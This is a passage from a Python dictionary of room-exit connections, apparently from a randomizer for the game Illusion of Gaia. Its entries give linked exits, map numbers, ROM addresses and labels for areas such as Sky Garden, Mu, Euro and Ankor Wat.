247: [246, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 71 to Map 68"],
# Nazca
260: [261, 0, 0, 162, 170, "5e6a2", b"\x4C\x68\x01\x40\x00\x83\x00\x22", False, True, True, "Nazca: Sky Garden entrance"],
261: [260, 0, 0, 0, 0, "5f429", b"\x4B\xe0\x01\xc0\x02\x03\x00\x44", False, True, True, "Nazca: Sky Garden exit"],
# Sky Garden
#270: [ 0, 0, 0, 171, 16, "", b"", False, True, True, "Moon Tribe: Sky Garden passage"],
273: [274, 0, 0, 170, 172, "", b"", False, True, False, "Sky Garden: Map 76 to Map 77"],
274: [273, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 77 to Map 76"],
275: [276, 0, 0, 170, 176, "", b"", False, True, False, "Sky Garden: Map 76 to Map 79"],
276: [275, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 79 to Map 76"],
277: [278, 0, 0, 170, 181, "", b"", False, True, False, "Sky Garden: Map 76 to Map 81"],
278: [277, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 81 to Map 76"],
279: [280, 0, 0, 170, 190, "", b"", False, True, False, "Sky Garden: Map 76 to Map 83"],
280: [279, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 83 to Map 76"],
281: [282, 0, 0, 172, 175, "", b"", False, True, False, "Sky Garden: Map 77 to Map 78 (E)"], # Room 1
282: [281, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 78 to Map 77 (W)"],
283: [284, 0, 0, 175, 173, "", b"", False, True, False, "Sky Garden: Map 78 to Map 77 (SE)"],
284: [283, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 77 to Map 78 (SW)"],
285: [286, 0, 0, 175, 174, "", b"", False, True, False, "Sky Garden: Map 78 to Map 77 (SW)"],
286: [285, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 77 to Map 78 (SE)"],
287: [288, 0, 0, 176, 169, "", b"", False, True, False, "Sky Garden: Map 79 to Map 86"], # Room 2
288: [287, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 86 to Map 79"],
289: [290, 0, 0, 176, 179, "", b"", False, True, False, "Sky Garden: Map 79 to Map 80 (NE)"],
290: [289, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 80 to Map 79 (NW)"],
291: [292, 0, 0, 179, 177, "", b"", False, True, False, "Sky Garden: Map 80 to Map 79 (N)"],
292: [291, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 79 to Map 80 (N)"],
293: [294, 0, 0, 178, 180, "", b"", False, True, False, "Sky Garden: Map 79 to Map 80 (S)"],
294: [293, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 80 to Map 79 (S)"],
295: [296, 0, 0, 168, 186, "", b"", False, True, False, "Sky Garden: Map 81 to Map 82 (NE)"], # Room 3
296: [295, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 82 to Map 81 (NW)"],
297: [298, 0, 0, 182, 188, "", b"", False, True, False, "Sky Garden: Map 81 to Map 82 (NW)"],
298: [297, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 82 to Map 81 (NE)"],
299: [300, 0, 0, 184, 187, "", b"", False, True, False, "Sky Garden: Map 81 to Map 82 (SE)"],
300: [299, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 82 to Map 81 (SW)"],
301: [302, 0, 0, 191, 196, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (NW)"], # Room 4
302: [301, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (NE)"],
303: [304, 0, 0, 192, 195, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (C)"],
304: [303, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (C)"],
305: [306, 0, 0, 197, 193, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (SE)"],
306: [305, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (SW)"],
307: [308, 0, 0, 167, 195, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (E)"],
308: [307, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (W)"],
# Seaside Palace
310: [311, 0, 0, 211, 201, "69759", b"", False, False, False, "Seaside entrance"], # ALWAYS LINKED
311: [310, 0, 0, 0, 0, "1906a", b"", False, False, False, "Seaside exit"],
312: [313, 0, 0, 200, 202, "19046", b"", False, False, False, "Seaside: Area 1 NE Room (in)"],
313: [312, 0, 0, 0, 0, "19114", b"", False, False, False, "Seaside: Area 1 NE Room (out)"],
314: [315, 0, 0, 200, 203, "19052", b"", False, False, False, "Seaside: Area 1 NW Room (in)"],
315: [314, 0, 0, 0, 0, "19120", b"", False, False, False, "Seaside: Area 1 NW Room (out)"],
316: [317, 0, 0, 200, 204, "1905e", b"", False, False, False, "Seaside: Area 1 SE Room (in)"],
317: [316, 0, 0, 0, 0, "1912c", b"", False, False, False, "Seaside: Area 1 SE Room (out)"],
318: [319, 0, 0, 200, 205, "1903a", b"", False, False, False, "Seaside: Area 2 entrance"],
319: [318, 0, 0, 0, 0, "19146", b"", False, False, False, "Seaside: Area 2 exit"],
320: [321, 0, 0, 205, 207, "1915e", b"", False, False, False, "Seaside: Area 2 SW Room (in)"],
321: [320, 0, 0, 0, 0, "19138", b"", False, False, False, "Seaside: Area 2 SW Room (out)"],
322: [323, 0, 0, 205, 209, "19152", b"", False, False, False, "Seaside: Fountain (in)"],
323: [322, 0, 0, 0, 0, "191d4", b"", False, False, False, "Seaside: Fountain (out)"],
# Mu
330: [331, 0, 0, 210, 212, "191ee", b"", False, True, True, "Mu entrance"],
331: [330, 0, 0, 0, 0, "191fc", b"", False, True, True, "Mu exit"],
332: [333, 0, 0, 212, 217, "", b"", False, True, False, "Mu: Map 95 to Map 96"],
333: [332, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 96 to Map 95"],
334: [335, 0, 0, 217, 220, "", b"", False, True, False, "Mu: Map 96 to Map 97 (top)"],
335: [334, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 97 to Map 96 (top)"],
336: [337, 0, 0, 220, 231, "", b"", False, True, False, "Mu: Map 97 to Map 99"],
337: [336, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 99 to Map 97"],
338: [339, 0, 0, 220, 225, "", b"", False, True, False, "Mu: Map 97 to Map 98 (top)"],
339: [338, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 97 (top)"],
340: [341, 0, 0, 218, 222, "", b"", False, True, False, "Mu: Map 96 to Map 97 (middle)"],
341: [340, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 97 to Map 96 (middle)"],
342: [343, 0, 0, 223, 227, "", b"", False, True, False, "Mu: Map 97 to Map 98 (middle)"],
343: [342, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 97 (middle)"],
# 344: [345, 0, 0, 000, 000, "", b"", False, True, False, "Mu: Map 95 to Map 98 (middle)"],
# 345: [344, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 95 (middle)"],
346: [347, 0, 0, 227, 233, "", b"", False, True, False, "Mu: Map 98 to Map 100 (middle E)"],
347: [346, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 100 to Map 98 (middle E)"],
348: [349, 0, 0, 233, 237, "", b"", False, True, False, "Mu: Map 100 to Map 101 (middle N)"],
349: [348, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 101 to Map 100 (middle N)"],
350: [351, 0, 0, 237, 234, "", b"", False, True, False, "Mu: Map 101 to Map 100 (middle S)"],
351: [350, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 100 to Map 101 (middle S)"],
352: [353, 0, 0, 234, 228, "", b"", False, True, False, "Mu: Map 100 to Map 98 (middle W)"],
353: [352, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 100 (middle W)"],
354: [355, 0, 0, 213, 232, "", b"", False, True, False, "Mu: Map 95 to Map 99"],
355: [354, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 99 to Map 95"],
356: [357, 0, 0, 245, 246, "", b"", False, True, False, "Mu: Map 95 to Map 98 (top)"],
357: [356, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 95 (top)"],
358: [359, 0, 0, 229, 224, "", b"", False, True, False, "Mu: Map 98 to Map 97 (bottom)"],
359: [358, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 97 to Map 98 (bottom)"],
360: [361, 0, 0, 224, 219, "", b"", False, True, False, "Mu: Map 97 to Map 96 (bottom)"],
361: [360, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 96 to Map 97 (bottom)"],
362: [363, 0, 0, 230, 216, "", b"", False, True, False, "Mu: Map 98 to Map 95 (bottom)"],
363: [362, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 95 to Map 98 (bottom)"],
364: [365, 0, 0, 230, 235, "", b"", False, True, False, "Mu: Map 98 to Map 100 (bottom)"],
365: [364, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 100 to Map 98 (bottom)"],
366: [367, 0, 0, 235, 239, "", b"", False, True, False, "Mu: Map 100 to Map 101 (bottom)"],
367: [366, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 101 to Map 100 (bottom)"],
368: [369, 0, 0, 239, 240, "", b"", False, True, False, "Mu: Map 101 to Map 102"],
369: [368, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 102 to Map 101"],
# Angel Village
382: [383, 0, 0, 250, 210, "1941e", b"", False, False, False, "Angel: Mu Passage (in)"],
383: [382, 0, 0, 0, 0, "191e2", b"", False, False, False, "Angel: Mu Passage (out)"], #custom
384: [385, 0, 0, 250, 251, "1942a", b"", False, False, False, "Angel: Underground entrance (in)"],
385: [384, 0, 0, 0, 0, "19446", b"", False, False, False, "Angel: Underground entrance (out)"],
386: [387, 0, 0, 251, 252, "19452", b"", False, False, False, "Angel: Room 1 (in)"],
387: [386, 0, 0, 0, 0, "194de", b"", False, False, False, "Angel: Room 1 (out)"],
388: [389, 0, 0, 251, 253, "19476", b"", False, False, False, "Angel: Room 2 (in)"],
389: [388, 0, 0, 0, 0, "19502", b"", False, False, False, "Angel: Room 2 (out)"],
390: [391, 0, 0, 251, 254, "1945e", b"", False, False, False, "Angel: Dance Hall (in)"],
391: [390, 0, 0, 0, 0, "1950e", b"", False, False, False, "Angel: Dance Hall (out)"],
392: [393, 0, 0, 251, 255, "1946a", b"", False, False, False, "Angel: DS Room (in)"],
393: [392, 0, 0, 0, 0, "194f6", b"", False, False, False, "Angel: DS Room (out)"],
# Angel Dungeon
400: [401, 0, 0, 251, 260, "19482", b"", False, True, True, "Angel Dungeon entrance"],
401: [400, 0, 0, 0, 0, "19534", b"", False, True, True, "Angel Dungeon exit"],
402: [403, 0, 0, 260, 261, "19528", b"", False, True, False, "Angel Dungeon: Map 109 to Map 110"],
403: [402, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 110 to Map 109"],
404: [405, 0, 0, 278, 262, "", b"", False, True, False, "Angel Dungeon: Map 110 to Map 111"],
405: [404, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 111 to Map 110"],
406: [407, 0, 0, 262, 263, "", b"", False, True, False, "Angel Dungeon: Map 111 to Map 112"],
407: [406, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 112 to Map 111"],
408: [409, 0, 0, 264, 265, "", b"", False, True, False, "Angel Dungeon: Map 112 to Chest"],
409: [408, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Chest to Map 112"],
410: [411, 0, 0, 279, 266, "", b"", False, True, False, "Angel Dungeon: Map 112 to Map 113"],
411: [410, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 113 to Map 112"],
412: [413, 0, 0, 266, 267, "", b"", False, True, False, "Angel Dungeon: Map 113 to Map 114"],
413: [412, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 114 to Map 113"],
414: [415, 0, 0, 268, 276, "", b"", False, True, False, "Angel Dungeon: Map 114 to Ishtar Foyer"],
415: [414, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Ishtar Foyer to Map 114"],
# Ishtar's Studio
420: [421, 0, 0, 277, 269, "196b6", b"", False, False, False, "Ishtar entrance"],
421: [420, 0, 0, 0, 0, "196c2", b"", False, False, False, "Ishtar exit"],
422: [423, 0, 0, 269, 270, "196ce", b"", False, False, False, "Ishtar: Portrait room (in)"],
423: [422, 0, 0, 0, 0, "196f4", b"", False, False, False, "Ishtar: Portrait room (out)"],
424: [425, 0, 0, 269, 271, "196da", b"", False, False, False, "Ishtar: Side room (in)"],
425: [424, 0, 0, 0, 0, "19700", b"", False, False, False, "Ishtar: Side room (out)"],
426: [427, 0, 0, 269, 272, "196e6", b"", False, False, False, "Ishtar: Ishtar's room (in)"],
427: [426, 0, 0, 0, 0, "1970c", b"", False, False, False, "Ishtar: Ishtar's room (out)"],
428: [429, 0, 0, 272, 274, "19718", b"", False, False, False, "Ishtar: Puzzle room (in)"],
429: [428, 0, 0, 0, 0, "197e6", b"", False, False, False, "Ishtar: Puzzle room (out)"],
# Watermia
440: [441, 0, 0, 280, 286, "197f4", b"", False, False, False, "Watermia: Lance House (in)"],
441: [440, 0, 0, 0, 0, "1983e", b"", False, False, False, "Watermia: Lance House (out)"],
442: [443, 0, 0, 280, 282, "19818", b"", False, False, False, "Watermia: DS House (in)"],
443: [442, 0, 0, 0, 0, "19868", b"", False, False, False, "Watermia: DS House (out)"],
444: [445, 0, 0, 280, 283, "1980c", b"", False, False, False, "Watermia: Gambling House (in)"],
445: [444, 0, 0, 0, 0, "1985a", b"", False, False, False, "Watermia: Gambling House (out)"],
446: [447, 0, 0, 280, 284, "19824", b"", False, False, False, "Watermia: West House (in)"],
447: [446, 0, 0, 0, 0, "19882", b"", False, False, False, "Watermia: West House (out)"],
448: [449, 0, 0, 280, 285, "19830", b"", False, False, False, "Watermia: East House (in)"],
449: [448, 0, 0, 0, 0, "19890", b"", False, False, False, "Watermia: East House (out)"],
450: [451, 0, 0, 280, 287, "19800", b"", False, False, False, "Watermia: NW House (in)"],
451: [450, 0, 0, 0, 0, "1984c", b"", False, False, False, "Watermia: NW House (out)"],
452: [453, 0, 0, 288, 311, "", b"", False, False, True, "Watermia: Euro passage"],
453: [452, 0, 0, 0, 0, "", b"", False, False, True, "Euro: Watermia passage"],
# Great Wall
462: [463, 0, 0, 290, 291, "", b"", False, True, False, "Great Wall: Map 130 to Map 131"],
463: [462, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 131 to Map 130"],
464: [465, 0, 0, 293, 294, "", b"", False, True, False, "Great Wall: Map 131 to Map 133"],
465: [464, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 133 to Map 131"],
466: [467, 0, 0, 296, 297, "", b"", False, True, False, "Great Wall: Map 133 to Map 134"],
467: [466, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 134 to Map 133"],
468: [469, 0, 0, 297, 298, "", b"", False, True, False, "Great Wall: Map 134 to Map 135"],
469: [468, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 135 to Map 134"],
470: [471, 0, 0, 299, 300, "", b"", False, True, False, "Great Wall: Map 135 to Map 136"],
471: [470, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 136 to Map 135"],
# Euro
482: [483, 0, 0, 310, 312, "19cd2", b"", False, False, False, "Euro: Rolek Company (in)"],
483: [482, 0, 0, 0, 0, "19d74", b"", False, False, False, "Euro: Rolek Company (out)"],
484: [485, 0, 0, 310, 313, "19d0e", b"", False, False, False, "Euro: West House (in)"],
485: [484, 0, 0, 0, 0, "19e12", b"", False, False, False, "Euro: West House (out)"],
486: [487, 0, 0, 310, 314, "19cde", b"", False, False, False, "Euro: Rolek Mansion West (in)"],
487: [486, 0, 0, 0, 0, "19d9c", b"", False, False, False, "Euro: Rolek Mansion West (out)"],
488: [489, 0, 0, 310, 314, "19cea", b"", False, False, False, "Euro: Rolek Mansion East (in)"],
489: [488, 0, 0, 0, 0, "19da8", b"", False, False, False, "Euro: Rolek Mansion East (out)"],
490: [491, 0, 0, 310, 317, "19d26", b"", False, False, False, "Euro: Central House (in)"],
491: [490, 0, 0, 0, 0, "19e54", b"", False, False, False, "Euro: Central House (out)"],
492: [493, 0, 0, 310, 318, "19d32", b"", False, False, False, "Euro: Jeweler House (in)"],
493: [492, 0, 0, 0, 0, "19e62", b"", False, False, False, "Euro: Jeweler House (out)"],
494: [495, 0, 0, 310, 319, "19d3e", b"", False, False, False, "Euro: Twins House (in)"],
495: [494, 0, 0, 0, 0, "19e70", b"", False, False, False, "Euro: Twins House (out)"],
496: [497, 0, 0, 310, 320, "19cc6", b"", False, False, False, "Euro: Hidden House (in)"],
497: [496, 0, 0, 0, 0, "19d66", b"", False, False, False, "Euro: Hidden House (out)"],
498: [499, 0, 0, 310, 321, "19d4a", b"", False, False, False, "Euro: Shrine (in)"],
499: [498, 0, 0, 0, 0, "19e7e", b"", False, False, False, "Euro: Shrine (out)"],
500: [501, 0, 0, 310, 322, "19cba", b"", False, False, False, "Euro: Explorer's House (in)"],
501: [500, 0, 0, 0, 0, "19d58", b"", False, False, False, "Euro: Explorer's House (out)"],
502: [ 0, 0, 0, 310, 323, "19cf6", b"", False, False, False, "Euro: Store Entrance (in)"],
#503: [502, 0, 0, 0, 0, "", b"", False, False, False, "Euro: Store Entrance (out)"], #this doesn't exist!
504: [505, 0, 0, 310, 324, "19d02", b"", False, False, False, "Euro: Store Exit (in)"],
505: [504, 0, 0, 0, 0, "19e04", b"", False, False, False, "Euro: Store Exit (out)"],
506: [507, 0, 0, 314, 316, "19db4", b"", False, False, False, "Euro: Guest Room (in)"],
507: [506, 0, 0, 0, 0, "19df6", b"", False, False, False, "Euro: Guest Room (out)"],
508: [509, 0, 0, 310, 325, "19d1a", b"", False, False, False, "Euro: Dark Space House (in)"],
509: [508, 0, 0, 0, 0, "19e20", b"", False, False, False, "Euro: Dark Space House (out)"],
# Mt. Kress
522: [523, 0, 0, 330, 331, "", b"", False, True, False, "Mt. Kress: Map 160 to Map 161"],
523: [522, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 161 to Map 160"],
524: [525, 0, 0, 332, 333, "", b"", False, True, False, "Mt. Kress: Map 161 to Map 162 (W)"],
525: [524, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 161 (W)"],
526: [527, 0, 0, 332, 334, "", b"", False, True, False, "Mt. Kress: Map 161 to Map 162 (E)"],
527: [526, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 161 (E)"],
528: [529, 0, 0, 333, 337, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 163 (N)"],
529: [528, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 163 to Map 162 (N)"],
530: [531, 0, 0, 337, 336, "", b"", False, True, False, "Mt. Kress: Map 163 to Map 162 (S)"],
531: [530, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 163 (S)"],
532: [533, 0, 0, 333, 338, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 164"],
533: [532, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 164 to Map 162"],
534: [535, 0, 0, 335, 339, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 165"],
535: [534, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 162"],
536: [537, 0, 0, 339, 342, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 166"],
537: [536, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 166 to Map 165"],
538: [539, 0, 0, 340, 343, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 167"],
539: [538, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 167 to Map 165"],
540: [541, 0, 0, 341, 344, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 168"],
541: [540, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 168 to Map 165"],
542: [543, 0, 0, 344, 345, "", b"", False, True, False, "Mt. Kress: Map 168 to Map 169"],
543: [542, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 169 to Map 168"],
# Native's Village
552: [553, 0, 0, 350, 352, "19fe6", b"", False, False, False, "Native's Village: West House (in)"],
553: [552, 0, 0, 0, 0, "1a00c", b"", False, False, False, "Native's Village: West House (out)"],
554: [555, 0, 0, 350, 353, "19ff2", b"", False, False, False, "Native's Village: House w/Statues (in)"],
555: [554, 0, 0, 0, 0, "1a01a", b"", False, False, False, "Native's Village: House w/Statues (out)"],
556: [557, 0, 0, 351, 400, "", b"", False, False, True, "Native's Village: Dao Passage"],
557: [556, 0, 0, 0, 0, "", b"", False, False, True, "Dao: Natives' Passage"],
# Ankor Wat
562: [563, 0, 0, 360, 361, "1a028", b"", False, True, False, "Ankor Wat: Map 176 to Map 177"],
563: [562, 0, 0, 0, 0, "1a036", b"", False, True, False, "Ankor Wat: Map 177 to Map 176"],
564: [565, 0, 0, 361, 363, "", b"", False, True, False, "Ankor Wat: Map 177 to Map 178"],
565: [564, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 178 to Map 177"],
566: [567, 0, 0, 365, 366, "", b"", False, True, False, "Ankor Wat: Map 178 to Map 179"],
567: [566, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 178"],
568: [569, 0, 0, 368, 367, "", b"", False, True, False, "Ankor Wat: Map 180 to Map 179"],
569: [568, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 180"],
570: [571, 0, 0, 367, 369, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 181"],
571: [570, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 181 to Map 179"],
572: [573, 0, 0, 371, 362, "", b"", False, True, False, "Ankor Wat: Map 181 to Map 177"],
573: [572, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 177 to Map 181"],
574: [575, 0, 0, 362, 372, "", b"", False, True, False, "Ankor Wat: Map 177 to Map 182"], # Garden
575: [574, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 182 to Map 177"],
576: [577, 0, 0, 372, 373, "", b"", False, True, False, "Ankor Wat: Map 182 to Map 183"],
577: [576, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 182"],
578: [579, 0, 0, 373, 376, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 184"],
579: [578, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 184 to Map 183"],
580: [581, 0, 0, 374, 378, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 185 (W)"],
581: [580, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 185 to Map 183 (W)"],
582: [583, 0, 0, 378, 375, "", b"", False, True, False, "Ankor Wat: Map 185 to Map 183 (E)"],
583: [582, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 185 (E)"],
584: [585, 0, 0, 375, 379, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 186"],
585: [584, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 186 to Map 183"],
586: [587, 0, 0, 379, 381, "", b"", False, True, False, "Ankor Wat: Map 186 to Map 187 (W)"],
587: [586, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 187 to Map 186 (W)"],
588: [589, 0, 0, 381, 380, "", b"", False, True, False, "Ankor Wat: Map 187 to Map 186 (E)"],
589: [588, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 186 to Map 187 (E)"],
590: [591, 0, 0, 381, 384, "", b"", False, True, False, "Ankor Wat: Map 187 to Map 188"],
591: [590, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187"],
592: [593, 0, 0, 393, 386, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 189"],
593: [592, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 189 to Map 188"],
594: [595, 0, 0, 387, 389, "", b"", False, True, False, "Ankor Wat: Map 189 to Map 190 (E)"],
595: [594, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 189 (E)"],
596: [596, 0, 0, 388, 390, "", b"", False, True, False, "Ankor Wat: Map 189 to Map 190 (W)"],
597: [597, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 189 (W)"],
598: [599, 0, 0, 390, 391, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 191"],
599: [598, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 191 to Map 190"],
600: [ 0, 0, 0, 366, 368, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 180 (drop)"],
601: [ 0, 0, 0, 392, 381, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 NW-L (drop)"],
602: [ 0, 0, 0, 392, 381, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 NW-R (drop)"],
603: [ 0, 0, 0, 392, 383, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 NE (drop)"],
604: [ 0, 0, 0, 393, 382, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 SW (drop)"],
605: [ 0, 0, 0, 389, 388, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 189 (drop)"],
# Dao
612: [613, 0, 0, 400, 401, "1a27c", b"", False, False, False, "Dao: NW House (in)"],
613: [612, 0, 0, 0, 0, "1a2d2", b"", False, False, False, "Dao: NW House (out)"],
614: [615, 0, 0, 400, 402, "1a288", b"", False, False, False, "Dao: Neil's House (in)"],
615: [614, 0, 0, 0, 0, "1a30a", b"", False, False, False, "Dao: Neil's House (out)"],
616: [617, 0, 0, 400, 403, "1a294", b"", False, False, False, "Dao: Snake Game House (in)"],
617: [616, 0, 0, 0, 0, "1a2ee", b"", False, False, False, "Dao: Snake Game House (out)"],
618: [619, 0, 0, 400, 404, "1a2a0", b"", False, False, False, "Dao: SW House (in)"],
619: [618, 0, 0, 0, 0, "1a2fc", b"", False, False, False, "Dao: SW House (out)"],
620: [621, 0, 0, 400, 405, "1a2ac", b"", False, False, False, "Dao: S House (in)"],
621: [620, 0, 0, 0, 0, "1a2e0", b"", False, False, False, "Dao: S House (out)"],
622: [623, 0, 0, 400, 406, "1a2b8", b"", False, False, False, "Dao: SE House (in)"],
623: [622, 0, 0, 0, 0, "1a318", b"", False, False, False, "Dao: SE House (out)"],
# Pyramid
634: [635, 0, 0, 411, 415, "", b"", False, True, False, "Pyramid: Map 204 to Map 205"],
635: [634, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 205 to Map 204"],
636: [637, 0, 0, 413, 416, "", b"", False, True, False, "Pyramid: Map 204 to Map 206"], # Room 1
637: [636, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 206 to Map 204"],
638: [639, 0, 0, 417, 418, "", b"", False, True, False, "Pyramid: Map 206 to Map 207"],
639: [638, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 207 to Map 206"],
640: [641, 0, 0, 419, 442, "", b"", False, True, False, "Pyramid: Map 207 to Map 218"],
641: [640, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 207"],
642: [643, 0, 0, 413, 420, "", b"", False, True, False, "Pyramid: Map 204 to Map 208"], # Room 2
643: [642, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 208 to Map 204"],
644: [645, 0, 0, 421, 422, "", b"", False, True, False, "Pyramid: Map 208 to Map 209"],
645: [644, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 209 to Map 208"],
646: [647, 0, 0, 423, 443, "", b"", False, True, False, "Pyramid: Map 209 to Map 218"],
647: [646, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 209"],
648: [649, 0, 0, 413, 431, "", b"", False, True, False, "Pyramid: Map 204 to Map 214"], # Room 3
649: [648, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 214 to Map 204"],
650: [651, 0, 0, 434, 435, "", b"", False, True, False, "Pyramid: Map 214 to Map 215"],
651: [650, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 214 to Map 215"],
652: [653, 0, 0, 435, 444, "", b"", False, True, False, "Pyramid: Map 215 to Map 218"],
653: [652, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 215"],
654: [655, 0, 0, 413, 436, "", b"", False, True, False, "Pyramid: Map 204 to Map 216"], # Room 4
655: [654, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 216 to Map 204"],
656: [657, 0, 0, 437, 438, "", b"", False, True, False, "Pyramid: Map 216 to Map 217"],
657: [656, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 217 to Map 216"],
658: [659, 0, 0, 439, 440, "", b"", False, True, False, "Pyramid: Map 217 to Map 219"],
659: [658, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 219 to Map 217"],
660: [661, 0, 0, 441, 445, "", b"", False, True, False, "Pyramid: Map 219 to Map 218"],
661: [660, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 219"],
662: [663, 0, 0, 413, 426, "", b"", False, True, False, "Pyramid: Map 204 to Map 212"], # Room 5
